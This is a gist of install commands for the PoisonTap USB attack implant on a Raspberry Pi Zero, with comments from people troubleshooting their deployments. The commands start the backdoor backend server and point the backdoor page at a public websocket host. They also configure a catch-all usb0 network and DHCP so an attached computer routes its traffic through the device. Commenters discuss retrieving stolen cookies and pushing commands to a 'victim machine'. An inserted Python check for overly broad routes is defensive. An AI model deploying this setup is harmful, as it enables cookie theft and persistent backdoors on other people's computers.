@jgamblin
Created November 19, 2016 02:06
PoisonTap Install Commands
##Server:
sudo apt-get update && sudo apt-get upgrade
sudo apt-get install screen nodejs nodejs-legacy git npm
sudo npm install websocket
git clone https://github.com/samyk/poisontap
screen
sudo node backend_server.js
##piZero:
sudo apt-get update && sudo apt-get upgrade
sudo apt-get -y install isc-dhcp-server dsniff screen nodejs git
git clone https://github.com/samyk/poisontap
Update ws://YOUR.DOMAIN:1337 in backdoor.html to your public IP
ws://poisontap.jgamblin.com:1337
#add this to /etc/network/interfaces:
auto usb0
allow-hotplug usb0
iface usb0 inet static
address 1.0.0.1
netmask 0.0.0.0
#Setup to run at boot:
sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh
add this to /etc/rc.local right above exit 0:
/etc/init.d/pi_startup.sh &
#DHCP:
sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf
add this to /etc/default/isc-dhcp-server:
INTERFACES="usb0"
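
A defender-side check for what the `usb0` stanza above implies, as an added example that is not part of the original gist: the interface declares `netmask 0.0.0.0`, which treats all of IPv4 as on-link, so a host can audit its own routing table for on-link routes that broad. The sample table is constructed, the function name and the `/8` threshold are hypothetical, and it is an assumption that a host attached to such a device ends up with a comparably wide route.

```python
import os
import socket
import struct

# Constructed sample in Linux /proc/net/route format (hex fields are little-endian).
SAMPLE_ROUTES = (
    "Iface\tDestination\tGateway\tFlags\tRefCnt\tUse\tMetric\tMask\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t0101A8C0\t0003\t0\t0\t100\t00000000\t0\t0\t0\n"   # normal default route via gateway
    "eth0\t0001A8C0\t00000000\t0001\t0\t0\t100\t00FFFFFF\t0\t0\t0\n"   # 192.168.1.0/24 on-link
    "usb0\t00000000\t00000000\t0001\t0\t0\t0\t00000000\t0\t0\t0\n"     # everything on-link via usb0
)

RTF_UP = 0x1        # route is usable
RTF_GATEWAY = 0x2   # destination is reached through a gateway (not on-link)


def _hex_to_ip(field):
    """Convert a little-endian hex field from /proc/net/route to dotted quad."""
    return socket.inet_ntoa(struct.pack("<I", int(field, 16)))


def _prefix_len(mask_field):
    """Prefix length is the number of set bits; byte order does not matter."""
    return bin(int(mask_field, 16)).count("1")


def broad_onlink_routes(route_text, min_prefix=8):
    """Return (iface, cidr) for active on-link routes wider than /min_prefix."""
    findings = []
    for line in route_text.splitlines()[1:]:          # skip the header row
        cols = line.split()
        if len(cols) < 8:
            continue
        iface, dest, flags, mask = cols[0], cols[1], int(cols[3], 16), cols[7]
        if not flags & RTF_UP or flags & RTF_GATEWAY:
            continue                                  # only direct (on-link) routes
        plen = _prefix_len(mask)
        if plen < min_prefix:
            findings.append((iface, f"{_hex_to_ip(dest)}/{plen}"))
    return findings


if __name__ == "__main__":
    path = "/proc/net/route"
    text = open(path).read() if os.path.exists(path) else SAMPLE_ROUTES
    for iface, cidr in broad_onlink_routes(text):
        print(f"review: {iface} claims {cidr} as directly connected")
```

Some VPN clients install wide on-link routes on their tunnel interface, so a hit is a prompt to identify the interface, not a verdict.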
@danthegoodman1

Question: for the ws://YOUR.DOMAIN:1337 do you have to have something like poisontap.whatever.com:1337 or can you just use an external ip like ##.##.###.###:1337 kind of deal? Is the subdomain pointing to anything in particular? Or as long as it is all consistent across the pi and the server that a bare ip would be ok? (the ##.## stuff)

@ajdulion

ajdulion commented Dec 1, 2016

hmm..

I set up my raspberry zero using the USB route (so no screen).

Getting the following errors when running the startup:

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

Anyone know if this is because I am setting up the device via USB?

@danthegoodman1

The thing that immediately jumps out to me is the "Device or resource busy" line. Unfortunately, if the case is that it is because it is being used, then the only way to solve it would be to edit that file before it is inserted into the Pi. The only way to stop the ONLY USB port is to not use it, but the Pi does not have integrated wifi that you could ssh into. I am by no means an expert on this, but that is what jumps out to me. I have not run that part of the installation yet, so I do not know if I will run into it or not.

@danthegoodman1

I am also wondering why this installation does not include anything about activating the g_eth. Like in this tutorial (found through the poisontap github) samyk/poisontap@068c283

@ajdulion

ajdulion commented Dec 2, 2016

Well, it seems to run, but now I have no clue where to find the cookies on my test setup. This tool is missing some manual/tutorials, I'm guessing.

@Stephen2929

poisontap/poisontap.cookies.log

@danthegoodman1

danthegoodman1 commented Dec 2, 2016

@Stephen2929 have you had success with the server side? (I finally got it working; the tutorial above is not very good. Note to everyone: use the link I posted, and do part 2 before part 1.) But when sending commands on the server, nothing is getting sent to the victim machine. I see that it was sent, and then on the screen that the backend is running on I see that it was requested. But when I send commands, like an alert command, nothing happens on the victim machine. Going through all of the logs, I cannot see any evidence of anything being sent to the machine. Also, when looking at the network graph, samy's has lots of color. Mine is mostly gray, however, and in the console I am getting 404 on almost all domain/poisontap links (I assume that is normal because those links don't actually exist). Any help would be greatly appreciated.

Edit: Update

@rinkunamaste

I tried all the steps described in pi.txt, but the Raspberry Pi Zero is not able to create a virtual Ethernet port on Windows 7 and Windows 10. Has anyone else had the same problem and sorted it out? I would appreciate any response. Thanks.

@himuura

himuura commented Dec 10, 2016

Same issue... followed all the pi.txt steps and still I haven't got a new Ethernet device. On Windows 7, 8.1 and 10. Perhaps some step is missing?

@mkmxu

mkmxu commented Dec 12, 2016

When I type "git clone https://github.com/samyk/poisontap"

I get this response:

Cloning into 'poisontap'...
remote: Counting objects: 396, done.
remote: Compressing objects: 100% (15/15), done.
error: RPC failed; result=56, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed

Is this something I've done, or on GitHub's side? Or what? Thank you in advance for your help.

@gabyavra

gabyavra commented Dec 21, 2016

I monitor the /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER on the raspberry zero. I also monitor the traffic using Wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stuck with a 169.254.X.X IP address. Any idea?

UPDATE: I made it work by reinstalling the base OS and NOT upgrading it with apt-get upgrade and BRANCH=next rpi-update. It seems that if I updated it, something went wrong. I don't know if it was the Ethernet emulation or DHCP, since both seem to work fine at first preview. I think the Ethernet emulation was to blame, since the ping between computer and raspberry didn't work, either I configured the computer with a static IP address!

@gersey2002

Does anyone have a tutorial on getting the back end server running? I'm not having any luck with it.

@eliddell1

eliddell1 commented Mar 14, 2017

I too am getting this error on start up:

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

Anyone know if this is because I am setting up the device via USB?

Can someone please help? @ajdulion how did you get this working?

@theCake75

@eliddell1 @ajdulion I have exactly the same problem, can you help me please?

@morpheuslord

I am not able to get the headless operations working. The RNDIS drivers are not supported. Anyone have any idea how I can solve this?

This is what it looks like now.
This is the error:

This device cannot start. (Code 10)

{Operation Failed}
The requested operation was unsuccessful.
